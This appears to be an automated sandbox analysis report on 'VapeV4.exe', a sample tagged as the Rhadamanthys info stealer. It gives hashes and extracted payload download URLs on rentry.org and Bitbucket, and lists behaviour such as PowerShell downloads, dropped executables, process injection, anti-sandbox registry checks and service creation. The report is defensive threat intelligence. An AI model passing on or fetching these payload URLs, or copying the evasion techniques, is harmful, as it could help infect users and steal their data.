Overview
overview
10Static
static
3VapeV4.exe
windows7-x64
10VapeV4.exe
windows10-2004-x64
10plugin.dll
windows7-x64
1plugin.dll
windows10-2004-x64
1regger.dll
windows7-x64
1regger.dll
windows10-2004-x64
1vapev4.dll
windows10-2004-x64
1vapex64.dll
windows7-x64
1vapex64.dll
windows10-2004-x64
1vk_swiftshader.dll
windows7-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows7-x64
1vulkan-1.dll
windows10-2004-x64
1Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 17:43
Static task
static1
Behavioral task
behavioral1
Sample
VapeV4.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
VapeV4.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
plugin.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
plugin.dll
Resource
win10v2004-20240611-en
Behavioral task
behavioral5
Sample
regger.dll
Resource
win7-20240508-en
Behavioral task
behavioral6
Sample
regger.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
vapev4.dll
Resource
win10v2004-20240611-en
Behavioral task
behavioral8
Sample
vapex64.dll
Resource
win7-20231129-en
Behavioral task
behavioral9
Sample
vapex64.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral10
Sample
vk_swiftshader.dll
Resource
win7-20240220-en
Behavioral task
behavioral11
Sample
vk_swiftshader.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
vulkan-1.dll
Resource
win7-20240221-en
Behavioral task
behavioral13
Sample
vulkan-1.dll
Resource
win10v2004-20240611-en
General
-
Target
VapeV4.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Extracted
https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
2ene502w.1t51.exedescription pid process target process PID 1300 created 2532 1300 2ene502w.1t51.exe sihost.exe -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsiexec.exepowershell.exeflow pid process 4 4200 powershell.exe 11 4200 powershell.exe 27 1124 powershell.exe 28 1808 powershell.exe 49 3600 msiexec.exe 57 4680 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1124 powershell.exe 4680 powershell.exe 4200 powershell.exe 1808 powershell.exe 4648 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
VapeV4.exe2ene502w.1t50.exe2ene502w.1t53.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation VapeV4.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation 2ene502w.1t50.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation 2ene502w.1t53.exe -
Executes dropped EXE 4 IoCs
Processes:
2ene502w.1t50.exe2ene502w.1t51.exe2ene502w.1t52.exe2ene502w.1t53.exepid process 2780 2ene502w.1t50.exe 1300 2ene502w.1t51.exe 3128 2ene502w.1t52.exe 400 2ene502w.1t53.exe -
Loads dropped DLL 6 IoCs
Processes:
MsiExec.exeMsiExec.exeMsiExec.exepid process 4044 MsiExec.exe 4044 MsiExec.exe 4044 MsiExec.exe 4044 MsiExec.exe 1272 MsiExec.exe 2468 MsiExec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 4544 powercfg.exe 2428 powercfg.exe 3592 powercfg.exe 3952 powercfg.exe -
Drops file in System32 directory 16 IoCs
Processes:
svchost.exesvchost.exeOfficeClickToRun.exe2ene502w.1t52.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe 2ene502w.1t52.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Tasks\RunNodeScriptAtLogon svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
2ene502w.1t52.exedescription pid process target process PID 3128 set thread context of 860 3128 2ene502w.1t52.exe dialer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmaccess\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cmd-shim\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\log.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-audit-report\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\store.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\write-file-atomic\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-stars.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\is-cidr\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\cssesc.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\core\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-edit.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\processor.js.map msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\http-proxy-agent\dist\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmfund\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\common.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-test.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\metavuln-calculator\lib\get-dep-spec.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\json-parse-even-better-errors\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\lib\blob.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\dependency-selectors.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\fix-bin.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\packaging\_elffile.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\common\helpers.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\unique-slug\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx.cmd msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\combinator.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\node.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\strip-trailing-slashes.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi-cjs\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-fund.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-star.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\lib\request.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\utils\tmpfile.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\package-url-cmd.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\aproba\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\processor.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-start.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@tufjs\canonical-json\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\disparity-colors\node_modules\ansi-styles\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\mjs\unescape.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\vendor\QRCode\QRMode.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\which\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\link-bins.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man5\install.5 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\color-name\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\analyzer.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\compare-loose.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.cmd msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\source\vendor\ansi-styles\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\input_test.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\gather-dep-set.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\dist\error.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\is-lambda\test.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\string-width-cjs\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@pkgjs\parseargs\examples\negate.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\compile_commands_json.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\vendor\QRCode\QRPolynomial.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\diff.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\set-blocking\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@pkgjs\parseargs\internal\errors.js msiexec.exe -
Drops file in Windows directory 18 IoCs
Processes:
msiexec.exesvchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\Installer\MSI9BBF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIACE9.tmp msiexec.exe File opened for modification C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSICF95.tmp msiexec.exe File created C:\Windows\Installer\e58979c.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9B80.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6} msiexec.exe File opened for modification C:\Windows\Installer\MSIAAA6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID552.tmp msiexec.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\Installer\e589798.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9BEF.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e589798.msi msiexec.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2248 sc.exe 4728 sc.exe 3384 sc.exe 944 sc.exe 3676 sc.exe 1432 sc.exe 3264 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 17 IoCs
Processes:
OfficeClickToRun.exemsiexec.exesvchost.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1719078350" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 22 Jun 2024 17:45:51 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={409365A8-F26E-4F8E-9DAD-5F806531037C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe -
Modifies registry class 33 IoCs
Processes:
Explorer.EXEmsiexec.exesihost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductName = "Node.js" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Version = "336330754" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\B1FA.tmp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPath msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\B1FA.tmp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\corepack msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts msiexec.exe Set value (int) 